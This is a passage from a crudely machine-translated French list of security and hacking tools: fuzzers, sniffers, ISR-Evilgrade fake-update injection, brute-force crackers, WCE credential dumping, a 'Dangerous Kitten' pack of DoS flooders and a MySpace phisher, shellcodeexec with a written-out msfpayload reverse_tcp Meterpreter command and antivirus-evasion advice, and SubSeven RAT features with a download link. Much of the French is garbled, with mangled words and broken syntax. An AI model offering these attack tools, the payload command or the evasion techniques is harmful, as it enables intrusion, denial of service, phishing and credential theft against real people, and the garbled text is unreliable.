travaillent au niveau binaire, peut tre utilis pour l'analyse des logiciels commer ciaux, ainsi que les binaires malveillants. Le projet vise BitBlaze pour concevoir et dvelopper une plate-forme d'analyse pui ssant binaires et emploient la plate-forme afin de (1) d'analyser et de dvelopper de nouveaux mcanismes de protection et de diagnostic et de COTS (2) analyser, co mprendre et dvelopper des dfenses contre les codes malveillants. Le projet s'effor ce galement BitBlaze d'ouvrir de nouveaux domaines de l'analyse binaire, qui four nit des solutions saines et efficaces des applications au-del des logiciels de scu rit et de dfense codes malveillants, tels que l'ingnierie inverse du protocole et l a gnration d'empreintes digitales. cross_fuzz http://lcamtuf.coredump.cx/cross_fuzz http://lcamtuf.blogspot.com/2011/01/announcing-crossfuzz-potential-0-day ... Le fuzzer doit beaucoup de son efficacit pour la gnration dynamique de trs longue du re de liquidation des squences d'oprations DOM dans plusieurs documents, inspecter des objets retourns, recursing en eux, et la cration de rfrences nud circulaire que l es mcanismes de stress-test de collecte des ordures. cross_fuzz dtaille fuzzing algorithme: 1. ts ue Ouvrez deux fentres avec des documents de tout type (DOM-activ). Simple documen HTML, XHTML, SVG et sont choisis au hasard comme des cibles par dfaut - bien q tout autre, les formats pris en charge ventuellement plugin-pourraient tre cibls la place.

2. Crawl DOM hirarchie du premier document, la collecte de rfrences des objets renc ontrs pour une rutilisation ultrieure.objets visites et rfrences recueillies sont tiqu ts en utilisant une proprit inject pour viter une rcursion infinie; une liste noire se condaire est utilise pour empcher la navigation loin ou descendre dans la fentre pr incipale. Critique, mlange alatoire et le contrle de sortance rcursivit sont utiliss p our assurer une bonne couverture.

3. ramper DOM Rptez, au hasard peaufiner rencontres proprits de l'objet en les plaant une l'une des rfrences prcdemment enregistres (ou, avec une certaine probabilit, un d une poigne de cod en dur "intressant" valeurs).

4. ramper DOM Rptez, au hasard d'appel rencontres mthodes de l'objet. paramtres d'app el sont synthtiss en utilisant des rfrences recueillies et intressant valeurs, comme i diqu ci-dessus. Si une mthode retourne un objet, sa sortie est ensuite analys et mo difi d'une manire similaire. 5. Alatoirement dtruire premier document en utilisant l'un des plusieurs mthodes po ssibles, la collecte des ordures bascule. 6. Effectuer le mme ensemble de ramper et oprations tweak pour le deuxime document, mais les rfrences utiliser les donnes collectes partir du premier document pour cras er les proprits et les mthodes d'appel dans le second. 7. Alatoirement dtruire les fentres de document, effectuer plus d'un pourcentage de rfrences recueillies pour le prochain cycle de fuzzing. dirtyJOE http://dirty-joe.com/ dirtyJOE - Java ensemble Editor est un diteur complexe et visionneuse pour les fi chiers binaires Java compils (fichiers de classe.). La version actuelle a encore

quelques limitations, mais j'espre que ceux qui seront supprims dans les prochaine s versions. dirtyJOE est gratuit pour un usage non-commercial. dirtyJOE est entirement crit en C + +, aucune bibliothque tierce partie taient utili ss. Principales caractristiques: * Viewer pour: constant pool, mthodes, champs, attributs * Sous la direction de:-tte du fichier constant pool, bytecode, fl0p http://lcamtuf.coredump.cx/fl0p-devel.tgz Cet outil a t libr le chemin du retour en l'an 2006 par M. Michal Zalewski. Il est l a croyance populaire que les protocoles scuriss tels que SSH, HTTPS, FTPS, etc son t compltement l'abri de la surveillance. Mais, fl0p va vous prouver le contraire. fl0p est un simple flux analyse passive L7 fingerprinter. Il examine passivement la suite des changes client-serveur l'intrieur de votre rseau avec leurs leur couc he relative 7 tailles de charge utile et des intervalles de transmission. Le rsul tat est ensuite jumels avec une base de donnes de signatures modle de trafic de ddui re de ses observations. Il le fait non pas en reniflant, mais seulement avec le rsultat. C'est pourquoi ayant une bonne base de donnes est la base de donnes import ant.The peut tre trouv dans le fichier fl0p.fp. Vous vous pouvez ajouter et amliore r la base de donnes avec vos entres. De la sortie que l'outil affiche, vous pouvez dchiffrer les adresses IP des deux htes participant la communication. En cas de trafic HTTPS, vous pouvez peut-tre au ssi vrifier le site que le client a demandes.

Il a t lchement bas sur un autre outil merveilleux - p0f et a t cod en C. Ceci tant l aison, il est pris en charge sur de nombreux systmes - Linux, * BSD, MacOS X, AIX , et Cygwin. Cela peut tre une intressante si vous avez beaucoup de temps pour planifier l'avan ce votre attaque. Vous pouvez continuer regarder la sortie et en apprendre davan tage sur le rseau. javasnoop http://code.google.com/p/javasnoop/ JavaSnoop est un outil qui vous permet d'intercepter les mthodes, modifier les do nnes et ailleurs tester la scurit des applications Java sur votre bureau. Il le fai t, en vous permettant de l'attacher un processus existant (comme un dbogueur) et instantanment avec altration des appels de mthode, d'excuter du code personnalis, ou simplement regarder ce qui se passe sur le systme. Comment faut-il joindre un pro cessus existant? Il installe stageloading "crochets" avec l'API Java Instrumenta tion et en travaillant avec certains bytecode. http://www.aspectsecurity.com/tools/javasnoop/ malwareanalyzer http://code.google.com/p/malwareanalyzer/ Il peut tre utile pour l'analyse de chane de base de registre Windows, les appels d'API, les commandes IRC, dtection DLL code appel et anti-VMWare. Il affiche en-tte s dtaille des PE avec tous ses dtails l'article, l'importation et l'exportation des

symboles etc Il peut galement effectuer une vidange complte de l'ASCII PE avec d' autres options. Il peut aussi gnrer des diverses sections d'un PE, comme l'en-tte D OS, DOS Stub, PE-tte de fichier, l'image d'en-tte en option, la section de table, Rpertoires de donnes, articles, etc analyseur Malware vous aidera galement l'analys e de code et de dmonter les logiciels malveillants. Il peut galement effectuer une vrification de logiciels malveillants en ligne www.virustotal.com.Sur la base de signatures PEiD, il peut galement dtecter les emballeurs utilis pour compresser le fichier. Il fournit galement une fonctionnalit de traage qui peuvent tre utiliss pou r identifier les anti-debugging tricks appels, appels de fichiers systme de manip ulation, rootkit crochets, crochets de clavier, DEP modification des paramtres, e tc minibis http://cert.at/downloads/software/minibis_en.html Construire une station automatise d'analyse personnalisables logiciels malveillan ts en utilisant uniquement des composants disponibles gratuitement l'exception d e la cible OS (Windows XP) elle-mme. En outre, un accent particulier rside dans la manipulation une norme quantit d'chantillons de logiciels malveillants et la mise en uvre effective au CERT.at. Comme l'objectif principal du lecteur de ce documen t devrait tre en mesure de construire sa propre installation et de configuration spcifiques tout en tant libre dans sa dcision les composants utiliser. pyrtique http://code.google.com/p/pyretic/ antipyrtiques et le dbogueur REpdb faciliter l'accs l'obtention de source ferme appl ications Python source. En un mot il vous permet de prendre un objet dans la mmoire au code source, sans avoir besoin de l'accs au bytecode directement sur le disque. Cela peut tre utile si le pyc applictions sur disque sont brouilles dans l'une des nombreuses faons. Prsentation de blackhat ici: http://prezi.com/kmyvgiobsl1d/pyretic-rich-smith-bla ckhatdefcon-2010/ streamarmor http://www.rootkitanalytics.com/tools/streamarmor.php StreamArmor est l'outil sophistiqu pour la dcouverte cache flux de donnes alternatif s (ADS) ainsi que de les nettoyer compltement le systme. C'est l'analyse automatiq ue de pointe associe un mcanisme de vrification en ligne menace en fait le meilleur outil disponible sur le march pour radiquer le mal d'eau. StreamArmor rapide est livr avec scanner multi ADS filet qui peut parcourir de faon rcursive sur le systme e ntier et dcouvrir rapidement tous les ruisseaux cachs. Toutes ces dcouvertes flux s ont reprsents en utilisant la couleur spcifique Patten fonction du niveau de menace qui le rend facile pour les yeux de l'homme de faire la distinction entre les s uspects et les cours d'eau normale. StreamArmor a intgr dans le mcanisme de dtection avance de type de fichier qui examin e le contenu du fichier de dtecter avec prcision le type de fichier de flux. Il es t donc grand outil de l'analyse mdico-lgale dans la dcouverte de documents cachs / i mages / audio / vido / base de donnes des fichiers / archives dans le flux de donne s alternatifs. StreamArmor est autonome, application portable qui ne ncessite auc une installation. Il peut tre copi n'importe quel endroit dans le systme et excut dir ectement. tcpdump http://www.tcpdump.org/

tcpdump est un outil informatique commun de dbogage rseau qui s'excute sous la lign e de commande. Il permet l'utilisateur d'intercepter et afficher TCP / IP et les autres paquets sont transmises ou reues sur un rseau auquel l'ordinateur est conn ect. VUSB-analyseur http://vusb-analyzer.sourceforge.net/ Le Virtual USB Analyzer est un outil gratuit et open source permettant de visual iser les journaux des paquets USB, partir d'outils matriels ou logiciels renifleu rs USB. Pour autant que nous savons, c'est le premier outil au monde pour fourni r une visualisation graphique avec des dumps hexa premires et d'analyse de protoc ole de haut niveau. Le Virtual USB Analyzer n'est pas en soi un outil sniffeur USB. Il est juste une interface utilisateur permettant de visualiser les journaux. Il supporte actuel lement trois formats de journaux, mais il est conu pour tre facilement extensible. Avec une dizaine de lignes de code Python en couple, vous pouvez ajouter le sup port pour votre format de journal favori. Nous avons dvelopp VUSB-analyseur chez VMware comme un moyen efficace pour dboguer notre virtualisation propre pile USB.Nous voulions un outil qui a fait, il est f acile de voir les problmes un coup d'il, et nous voulions un moyen de rsoudre les d eux exactitude des bugs de performance. En consquence, nous nous sommes retrouvs a vec ce que nous pensons est un outil assez unique. Nous sommes ravis d'avoir mai ntenant l'occasion de la libration de cet outil en tant que logiciel open source, sous licence MIT. http://esec-lab.sogeti.com/dotclear/index.php?post/2011/04/06/Sniffing-U ... VMWare offre la possibilit de jeter tout le trafic usb au plus bas niveau un fich ier de vidage. Nous allons dcrire ici comment activer cette fonction, et en outre publier un script pour convertir le fichier dump au format PCAP, adapt pour une utilisation avec wireshark. Attaquer Applications Process Hacker http://processhacker.sourceforge.net/ Process Hacker est un lment-emballs outil pour manipuler les procds et services sur v otre ordinateur. Un simple arborescence personnalisable avec mise en surbrillance de vous montrer les processus s'excutant sur votre ordinateur. # Graphiques de performances dtaills. # Une liste complte des services et un contrle total sur leur (marche, arrt, pause, reprendre et supprimer). # Une liste des connexions rseau. # Des informations compltes pour tous les processus: l'histoire complte la perform ance des processus, annonce fil et piles avec les symboles dbghelp, les informat ions du jeton, informations sur les fichiers du module et cartographis, la carte mmoire virtuelle, les variables d'environnement, poignes, ... # Contrle total sur tous les processus, les processus, mme protgs par des rootkits o u des logiciels de scurit. Son pilote en mode noyau a des capacits uniques qui lui permet de rsilier, de suspendre et de reprendre tous les processus et les threads , y compris les logiciels comme IceSword, avast! anti-virus, AVG Anti-Virus, Com odo Internet Security, etc (pour n'en nommer que quelques-uns). # Trouver les processus cachs et de les dnoncer. Process Hacker dtecte les processu

s cachs par les rootkits simples telles que le Hacker Defender et FU. # Easy DLL injection et de dchargement - simplement un clic droit et slectionnez u n processus "Injecter DLL" afin d'injecter et un clic droit sur un module et slec tionnez "Dcharger" pour dcharger! # Beaucoup d'autres fonctionnalits ... Sniff-n-Spit http://www.andlabs.org/tools.html Au cours de tests d'intrusion, on peut voir que les paisses clients parfois commu niquer avec un serveur dont l'adresse IP est cod en dur pour it.The communication HTTP entre le client et le serveur est par exemple difficile d'intercepter et d 'essai. Sniff-n-Snip est un utilitaire trs utile dans de tels scnarios. Il renifle les paquets HTTP du client vers le serveur et les transmet votre proxy prfre (Burp , WebScarab, etc Paros). Des entres d'utilisateur: L'outil prvoit l'entre d'utilisateur suivants: * Nombre de l'interface d'coute. Ce numro peut tre trouv en utilisant le "-l". * Source IP, port source (en option), IP de destination, et Destination Port de la session TCP qui est ddaigner * IP cible et la cible Port du proxy Interceptor. Gnralement, les valeurs seront 1 27.0.0.1, 8080. * L'outil peut tre forc couter sur le mode promiscuous "dans le"-p "commutateur. Ce ci est dsactive par dfaut. Exigences: * WinPcap doit tre install sur le systme, l'outil a besoin de cette bibliothque pour l'analyse des paquets. Le vol TFTP http://code.google.com/p/tftptheft/ Le vol TFTP est un outil qui permet de numriser rapidement / bruteforce un serveu r tftp pour les fichiers et les tlcharger instantanment. thief.py - des tlchargements de fichiers bas sur un modle ou une liste de fichiers finder.py - cherche des serveurs TFTP sur une plage d'adresses IP de la cible TFTPTheft est une collection de deux scripts - un pour le tlchargement de fichiers partir de cibles dcouvert et l'autre pour dcouvrir les objectifs. Les noms de ces scripts Python deux sont - thief.py et finder.py. Ainsi, vous pouvez considrer c e assez complet.C'est un outil qui permet de numriser rapidement / bruteforce un serveur TFTP pour les fichiers et les tlcharger instantanment. Il peut le faire, pa rce que TFTP, le protocole Trivial FTP souffre encore d'un inconvnient majeur - p as d'authentification. evilgrade rapport de recherche internationale http://www.infobyte.com.ar/developments.html Il est une structure modulaire qui nous permettent de tirer parti des implmentati ons de mise niveau pauvres en injectant des mises jour de faux.

Ce que vous pouvez faire est de laisser ISR-Evilgrade sais que quelqu'un est dem and pour une mise jour, et c'est tout. Le reste sera fait par l'outil lui-mme. L'o util d'origine va tlcharger une mise jour que si elle a t tlcharg depuis le site pri

pal au lieu de votre serveur de mise jour interne! A partir de maintenant, rappo rt de recherche internationale-Evilgrade prend en charge les modules suivants: FreeRIP 3,30 * * Jet photo 4.7.2 Teamviewer * 5.1.9385 ISOpen * 4.5.0 * Istat. Gom * 2.1.25.5015 * ATube Catcher 1.0.300 Vidbox * 7,5 * Ccleaner 30/02/1130 * FCleaner 1.2.9.409 * AllMyNotes 1,26 * Notepad + + 5.8.2 * Java 1.6.0_22 winxp/win7 aMSN 0.98.3 * * <= Appleupdate 2.1.1.116 (Safari 5.0.2 7533.18.5, <Itunes = 10.0.1.22, <= 7.6. 8 Quicktime 1675) * Mirc 7,14 * Mise jour Windows (IE6 lastversion, IE7 7.0.5730.13, ie8 8.0.60001.18702, Micr osoft Works) Dap * 9.5.0.3 Winscp * 4.2.9 Script AutoIt * 3.3.6.1 * Clamwin 0.96.0.1 * Installer AppTapp 3.11 (Iphone / Itunes) * GetJar (facebook.com) * Google Analytics Javascript injection Speedbit * Optimizer 3.0 acclration vido / 2.2.1.8 Winamp 5.581 * * TechTracker (CNET) 1.3.1 (Build 55) * 2.4.8es Nokiasoftware mise jour du firmware (logiciel Windows) * Nokia firmware v20.2.011 BSplayer * 2.53.1034 * Apt (<Ubuntu 10.04 LTS) berTwitter * 4.6 (0.971) Facebook Blackberry * 1.7.0.22 | Twitter 1.0.0.45 Cpan * 1,9402 * VirtualBox (3.2.8) * Discussion Express * Filezilla * Flashget * Miranda * Orbit * Photoscape. AntiRootkit Panda * * Skype * Sunbelt * SUPERAntiSpyware * <Trillian = 5.0.0.26 Adium * 1.3.10 (cadre Sparkle) * VMware les vecteurs d'attaque: -------------Interne dcor: - L'accs des DNS - ARP spoofing

- DNS Cache Poisoning - DHCP spoofing Externe dcor: - L'accs des DNS - DNS Cache Poisoning Spiderpig http://code.google.com/p/spiderpig-pdffuzzer/ Adobe et d'autres utilisations javascript dans les fichiers PDF amliorer le workf low standard, par exemple la connexion la base de donnes, la vrification orthograp hique, impression n visualisation, etc. Lorsque nous ouvrons pdf dans le lecteur , il excute ce code javascript (tu nous savons tous que). si l'objectif de Spider pig est de trouver des bogues dans le moteur javascript pour lire les pdf's. Spi derpig lit prototype mthodes partir d'un fichier d'entre et cre un fichier pdf. La plupart des fuzzers pdf qui sont disponibles sur Internet sont fuzzers format de fichier qui tente de fuzz format d'Adobe fichier implementation.I na pas trouve r un fuzzer qui Fuzz imeplementaiton javascript Adobe, Nous avons donc ici un fu zzer Spiderpig javascript pour format de fichier pdf qui tente devisser pour lir e les pdf en utilisant des mthodes javascript. De vrification des pouvoirs Bruter http://sourceforge.net/projects/worawita/ Bruter est un rseau parallle connexion brute forcer sur Win32. Cet outil est desti n dmontrer l'importance de choisir des mots de passe forts. Le but de Bruter est d e soutenir une varit de services qui permettent l'authentification distance. Cain & Abel

http://www.oxid.it/cain.html Cain & Abel est un outil de rcupration de mot de passe pour systmes d'exploitation Microsoft. Il permet une rcupration aise des diffrents types de mots de passe en sni ffant le rseau, craquage de mots de passe crypt l'aide du dictionnaire, force brut e et les attaques cryptanalyse, enregistrement des conversations VoIP, le dcodage des mots de passe brouills, rcuprer les cls de rseau sans fil, rvlant botes mot de p e, dcouvrir des mots de passe en cache de routage et d'analyse protocole. KrbGuess http://www.cqure.net/wp/krbguess/ KrbGuess est un petit outil simple et qui peut tre utilise durant les essais de scu rit de deviner les noms d'utilisateur valides l'encontre d'un environnement Kerbe ros. Il vous permet de faire cela en tudiant la rponse une demande TGT pour le ser veur KDC.L'outil fonctionne la fois contre Microsoft Active Directory, le MIT et Heimdal Kerberos implmentations. En outre, il permet de dtecter si un compte n'a pas de pr-authentification. Medusa vrificateur parallle connexion rseau http://www.foofus.net/jmk/medusa/medusa.html Medusa est destin tre un rapide, massivement parallle, modulaire, connexion brute f orcer. L'objectif est de soutenir autant de services qui permettent l'authentifi cation distance possible. L'auteur considre les points suivants comme certains de s principales caractristiques de cette application: - Essais de fil base parallle. essais par force brute peut tre effectue sur plusieu

rs htes, utilisateurs ou mots de passe en mme temps.

- L'entre d'utilisateur flexible. informations cible (hte / utilisateur / mot de p asse) peut tre spcifi dans une varit de faons. Par exemple, chaque lment peut tre so e entre unique ou d'un fichier contenant des entres multiples. En outre, un format de fichier combinaison permet l'utilisateur d'affiner leur liste cible. - La conception modulaire. Chaque module de service existe un fichier mod. Indpen dante. Cela signifie qu'aucune modification n'est ncessaire l'application de base afin d'tendre la liste des services pris en charge pour brute force. Ncrack http://nmap.org/ncrack/ Ncrack est une authentification de rseau haute vitesse de fissuration outil. Il a t construit pour aider les entreprises scuriser leurs rseaux de manire proactive tou s les tests de leurs htes et les priphriques rseau pour les mots de passe faibles.pr ofessionnels de la scurit comptent galement sur Ncrack lors de la vrification de leu rs clients. Ncrack a t conu selon une approche modulaire, une syntaxe de ligne de c ommande similaire Nmap et un moteur dynamique qui peut adapter son comportement en fonction des informations rseau. Elle permet de rapides, de la vrification gran de chelle et fiable de plusieurs htes. caractristiques Ncrack comprennent une interface trs souple octroi de l'utilisateu r le plein contrle du fonctionnement du rseau, permettant de trs sophistiqu attaques bruteforcing, le calendrier des modles pour la facilit d'utilisation, l'interacti on d'excution similaire Nmap et bien plus. Ncrack a dmarr comme un Google Summer of Code" du projet en 2009. Alors qu'il est dj utile certaines fins, il est encore inacheve, des logiciels de qualit alpha. * Ncrack pouvez maintenant casser le Remote Desktop Protocol sur toutes les vers ions de Windows XP partir et au-dessus, avec l'introduction du module de RDP. Le s utilisateurs sont bien aviss de la bande de roulement http://seclists.org/nmapdev/2010/q3/450 pour le craquage des machines Windows XP, car ils ne peuvent pas grer plusieurs connexions simultanes RDP. * Mise en uvre du module SMB qui peut se fissurer Microsoft SMB / CIFS services a insi que UNIX serveurs Samba. * Lancement de la '-f' option, ce qui oblige quitter Ncrack craquage d'un servic e aprs qu'il trouve un titre de comptence pour cela.Spcification de l'option deux r eprises comme "-f-f fera Ncrack tcompltement quitter aprs tout titre se trouve sur tout service. * Ajout du support pour les essais blanc le mot de passe. Ncrack va maintenant t ester une entre vide chaque fois qu'il voit une ligne vide dans l'une des listes de mots. Le mme comportement s'applique pour le passage des options utilisateur ou de passage . * Amlioration de la scorpion Ncrack logwith une version mise jour SVG. RSYaba

http://www.randomstorm.com/rsyaba-security-tool.php RSYaba est un outil pour excuter des attaques par force brute contre divers servi ces d'une manire similaire Hydra et Mduse.L'outil a t rdig aprs de mauvaises exprie obtenir les outils existants de fonctionner correctement avec le protocole HTTP et SSH il a t dcid de faire un outil qui serait plus facile configurer. Tlcharger RSYaba L'outil est crit en Ruby afin de modifier les scripts est beaucoup plus simple qu e d'avoir changer C / C + + puis recompiler le code. Tous les modules de mesure sont bases sur les pierres prcieuses Ruby standard, de sorte qu'ils traitent tous

les trucs protocole qui veut dire qu'il ya un bon niveau d'abstraction pour le c adre d'attaque relle. Pendant la rdaction du module HTTP, une fonctionnalit a t ajoute qui fait dfaut dans t ous les bruteforcers HTTP d'autres, la capacit de grer l'authentification qui repo se sur un cookie dj fixs et, encore plus strictes, les formes qui utilisent des jet ons unique afin d'viter les attaques par force brute. L'outil prend actuellement en charge HTTP, MySQL et SSH et de nouveaux modules s eront ajouts et mis jour cette page en consquence. Sous la direction de Windows de vrification des pouvoirs http://www.ampliasecurity.com/research.html Sous la direction de Windows de vrification des pouvoirs (WCE) permet de lister l es sessions d'ouverture de session et ajouter, modifier, supprimer la liste et l es informations d'identification associes (ex.: LM / NT hash). Ceci peut tre utili s, par exemple, pour effectuer la transmission de la table de hachage sur Windows et galement obtenir NT / LM hash partir de la mmoire (les ouvertures de session i nteractive, services, connexions Bureau distance, etc) qui peuvent tre utiliss d'a utres attaques. Compatible Windows XP, 2003, Vista, 7 et 2008 (Vista n'a pas t fait encore test, ma is il devrait fonctionner) THC-Hydra http://freeworld.thc.org/thc-hydra/ Un biscuit sal du rseau trs rapide d'ouverture de session qui supporter de nombreux services Dark Alley Dangereuses Kitten http://partyvan.info/wiki/Dangerous_Kitten "Dangerous Kitten" tire son nom de la faon dont il a t initialement rpartis - un rar incorpor dans un jpg, avec la photo d'un chaton dans une main, et le sous-titre "Il est dangereux d'y aller seul, profiter de cette". Il s'agit d'un ensemble d' outils, dont beaucoup dj ici, mais il ya des nouveaux outils qui ne sont pas n'imp orte o ailleurs sur le w / i / ki. Liste d'outils (mise jour v3) * Windows (et du vin pour les pds Linux et Mac) o BWraep o BWRaeper.NET Leecher o Proxy Forum o LOIC o Longcat Flooder (distribu et autonome) Flood Ping o o rok / i / ts o SMAC o Sinflood wgetraep o o Certains app gay unlimit connectiosn ip Serveur SMTP o o Tous les nouveaux quipements DoS * Linux / Unix / Mac pygetraep o * Base sur le Web

o Les liens de tlchargement de serveurs web: WAMP (Windows) XAMPP (Windows / Linux / Mac / Solaris) et MAMP (Mac) AnonProxy o * Flooder o Formulaire FormFlood * o floodeur Mail o Miniloader o Myspace phisher o Vampire Raep script Imagerie Raid o + Hueg3.jpg + Filigranes EbaumsWorld.com + Goatse * Moar nouvelle merde o / i / + Kit Hackerpackage inclus o Mises jour gnrales et beaucoup de merde ajout. Les champs marqus d'une * sont nouveaux ou mis jour dans la version la plus rcente . shellcodeexec https: / / github.com / inquisb / shellcodeexec http://bernardodamele.blogspot.com/2011/04/execute-metasploit-payloads-b ... = Brve description = shellcodeexec est un petit script excuter en mmoire une squence d'opcodes. Contexte = = La plupart des lanceurs shellcode l-bas, y compris la preuve des concepts partie d'un grand nombre de scurit des livres, des informations sur la faon d'allouer une page mmoire lecture / criture / excutable sur les systmes POSIX, copiez votre shellcode et de l'excuter. Cela fonctionne trs bien. Cependant, elle est limite POSIX, ne considre pas ncessairement l'architecture 64-bits et les systmes Windows. = Description = Ce script et les fichiers de projet pertinent (Makefile et Visual Studio fichiers) vous permettent de compiler l'outil une fois, puis excutez votre shellc ode dans diffrentes architectures et systmes d'exploitation. En outre, il rsout un problme rel monde commun: le systme cible anti logiciel de blocage de virus un stager charge Metasploit-gnrs (soit EXE de ELF). Prenez par exemple la ligne de commande suivante: fentres msfpayload $ / Meterpreter / reverse_tcp EXITFUNC processus = LPORT = 444 4 = 192.168.136.1 LHOST R | msfencode-a-e x86 x86/shikata_ga_nai-o / tmp / paylo ad.exe-t exe Cela gnre une charge utile stager Metasploit, payload.exe, que ds que il atterrit sur le systme cible AV-protge est reconnue comme dangereuse et potentiellement bloqus (selon l'analyse l'accs des paramtres) par de nombreux produits anti-virus. Au moment de la rdaction de ce texte, 21 41 anti virus le dtecte comme malveillant - http://goo.gl/HTw7o. En encodant plusieurs fois avec msfencode, moins logiciels AV le dtecte pas, encore beaucoup. J'ai t surfer sur le net et j'ai trouv quelques tutoriaux intressants et

guides sur les emballages, la compression, obscurcir et l'application de l'IDA-f oo excutables portables et similaires en vue de rduire le nombre d'AV produits qui peuvent le dtecter comme un fichier malveillant. Cela est d'autant i ntressante, mais ne s'arrte pas quelques durs mourir virus anti de dtecter votre porte drobe. Donc la question est, comment serait-il cool d'avoir une solution dfinitive viter tous ces tracas? C'est exactement l o cet outil entre en jeu! Caractristiques = = shellcodeexec: * Peut tre compil et fonctionne sur POSIX (Linux / Unix) et les systmes Windows. * Peut tre compil et fonctionne sur 32-bit et 64-bit architectures. * Pour autant que je sache, aucun AV dtecter comme malveillants. * Fonctionne dans DEP / NX-environnements permis: il alloue la page de mmoire o il stocke les shellcode que + rwx - inscriptibles lisibles et excutables. * Il supporte des charges utiles alphanumriques cods: vous pouvez diriger votre co dage binaire shellcode (gnrs par exemple avec msfpayload Metasploit a) msfencode Metasploit pour l'encoder avec l'encodeur alpha_mixed.Rglez le variable BufferRegister au registre EAX o l'adresse en mmoire de le shellcode sera conserve, afin d'viter get_pc () stub binaire ajout au dbut du shellcode. * Gnre un nouveau thread o le shellcode est excut dans une structure gestionnaire d'exception (SEH) de sorte que si vous envelopper shellcodeexec dan s vos propres excutable, il vite l'ensemble du processus de collision en cas d'imprvus comportements. SubSeven http://www.subseven.org/home.php SubSeven 2.3 est un simple, facile utiliser l'outil d'administration distance (R AT) conu pour fonctionner sur toutes les plates-formes Windows actuelles, la fois 32 bits et 64 bits. Cet outil est destin aux personnes qui veulent que le pouvoi r peu plus et le contrle de gestion informatique distance. S'il vous plat utiliser cet outil de faon responsable et lu et j'accepte l'avertissement avant de l'util iser.Si vous n'tes pas d'accord avec l'avertissement, s'il vous plat ne pas utilis er l'outil. Vous acceptez la responsabilit pleine et entire responsabilit de vos ac tions lors de l'utilisation SubSeven. Ne pas utiliser cet outil sur les ordinate urs que vous n'tes pas autoris contrler. Aperu des caractristiques SubSeven.exe (911KB) Client: - Transfert Vue (upload / download de dtails <-> de l'hte) - Fentre d'affichage (Voir active sur Windows SubSeven) Managers:

- Gestionnaire de fichiers (upload / download / run / supprimer / lire des fichi ers sur l'hte) - Registry Manager (modifier / ajouter / supprimer des entres de registre sur l'ht e) - Gestionnaire des services (services de rafrachissement / installer des services / supprimer des services / gestion de l'hte distant) - Process Manager (vue active / tuer les processus actifs de niveau dll) - Fun Manager (farces gnral de bureau) Espionnage: - Ordinateur de bureau (et cliquez sur le bureau de l'hte distant) - Webcam (Voir la webcam sur l'hte distant) - Audio (capture micro / ligne-dans l'entre ne l'hte distant) GIF - 2.4 ko Rseau: - TCP Tunnel (relais ports hte distant l'ordinateur local) - Circulation Viewer (listes connexions rseau actives sur l'hte distant) - Rseau navigateur (la liste des partages sur l'hte distant, permet de cartographi er) Systme: - Remote Shell (afficher l'invite de commandes sur l'hte distant comme s'il tait l ocal) - Mot de passe (rcuprer perdu / mots de passe oublis pour les diffrents navigateurs, de stockage, les clients de messagerie et messagerie instantane) - Install Apps (liste des applications installes) - Options du serveur (arrt / marche / supprimer du serveur sur l'hte distant) Construit dans les outils: - IP statique Notification client (NAS client) (un outil d'coute qui permet vos ht es distance pour vous avertir quand ils sont en ligne) - NO-IP compte / IP outil de mise jour automatique (vous permet d'entrer vos inf ormations de compte NO-IP de mise jour automatique le site Web des changements d e proprit intellectuelle) - Groupe de raccourci (vous permet d'ajouter vos services prfrs en tant que raccour cis - Indication et excute Active barre d'tat (vous donne des informations utiles) EditServer.exe (254KB) L'tat du serveur: - Lire (vous permet de parcourir et lire les paramtres du serveur) - Les extensions serveur (vous permet de vrifier que l'extension que vous souhait ez le serveur utiliser) - Rpertoire d'installation (vous permet si vous souhaitez que le serveur doit tre install) - Serveur de protection (mot de passe vous permet de protger le serveur) - Faire fondre le serveur (le serveur permet disparatre une fois excut) - Attendre le redmarrage (attend excuter lors de la rinitialisation suivante) - Excuter visibles (permet l'ordinateur hte savoir le serveur est en cours d'excuti on) Nom du serveur (ce qu'il dit) -

Faux messages: Activer (actifs de l'option faux message) Message icne (vous permet de choisir votre image pour le message) Boutons disponibles (slectionnez les options de l'ordinateur hte doit presse) Titre du message (le texte le titre du message) Message texte (le texte du corps du message) Test (vous permet de tester le message sur votre PC)

mthodes de dmarrage: - Registre Run (excuter installe sous cl de registre) - Registre RunServices (s'installe sous cl de Registre RunServices) - Registre RunOnce (installe sous cl runonce registre) - ActiveX (installe dans l'ActiveX chemin de cl) - Explorer (installe sur l'excution de Shell de l'explorateur) - Winlogon (le mme que ci-dessus pour winlogon) - Politiques (excute sur Windows politiques de dmarrage) - Nom de la cl (keyname pour les entres de registre Par exemple Remote Server Host .) Notifications: - NAS (prciser votre rseau local adresse IP externe ici, ou pour des essais locaux 127.0.0.1) - CGI / PHP (prciser votre adresse de site Web, par exemple http://www.host.com, gnrer le script et de le transfrer votre php / cgi d'accueil) Fichiers Bind: - Slectionnez un fichier se lier au serveur. Le fichier binded excutera avec le se rveur - par exemple, vous pouvez excuter tinyvnc pour la gestion plein cran) Pare-feu Windows: - Dsactiver le Pare-feu (dsactive le pare-feu offre UAC est dsactiv) - Dsactiver Win dfenseur (dsactive Windows Defender) - Dsactiver l'UAC (dsactive l'UAC lors de la rinitialisation suivante) Exe: - .dll Load / exe (charger un exe ou dll pour extraire les icnes et les utiliser sur votre serveur.) - Navigateur (naviguer vers ico.) Server.exe (58.5KB) - C'est votre serveur configur pour dployer sur l'hte distant. Tlcharger>> http://www.firecat.fr/---sys/SubSeven_2.3.rar winAUTOPWN http://blacklistedhosting.com/users/quakerdoomer/v2/w/ winAUTOPWN est un auto (hacking) shell gagner outil. Il peut galement tre utilis po ur tester IDS, IPS et d'autres capteurs de surveillance / logiciels. Autohack vos cibles avec une interaction moins possible. Caractristiques:

* Contient dj compils par les excutables d'exploits clbres et efficaces alongwith quel ques exploits d'origine. * Pas besoin de dboguer un script ou de compiler le code source. * Scanne tous les ports 1 -* 65535 aprs avoir pris l'adresse IP et tente tous les exploits possibles en fonction de la liste des ports ouverts dcouvert (OpenPorts .TXT) * PortScan est multi-thread. * Ne ncessite pas de base de donnes l'arrire-end comme les autres * Peut galement tre utilis pour tester l'efficacit de l'IDS / IPS * Lanc exploits sont indpendants et ne s'appuie pas sur les empreintes de service (pour viter l'vasion, le cas chant) Base de donnes DB Audit http://www.softtreetech.com/dbaudit/download.htm DB Audit Expert est une solution professionnelle de base de donnes d'audit pour O racle, Sybase, DB2, MySQL et Microsoft SQL Server.DB Audit Expert permet aux adm inistrateurs de bases de donnes et systme, aux administrateurs scurit, aux auditeurs et aux oprateurs de suivre et d'analyser toute activit de base de donnes y compris la scurit de base de donnes, l'accs et l'utilisation, la cration de donnes, modificat ion ou suppression. Ce qui rend DB Audit vraiment unique est sa prise en charge intgre de plusieurs mthodes 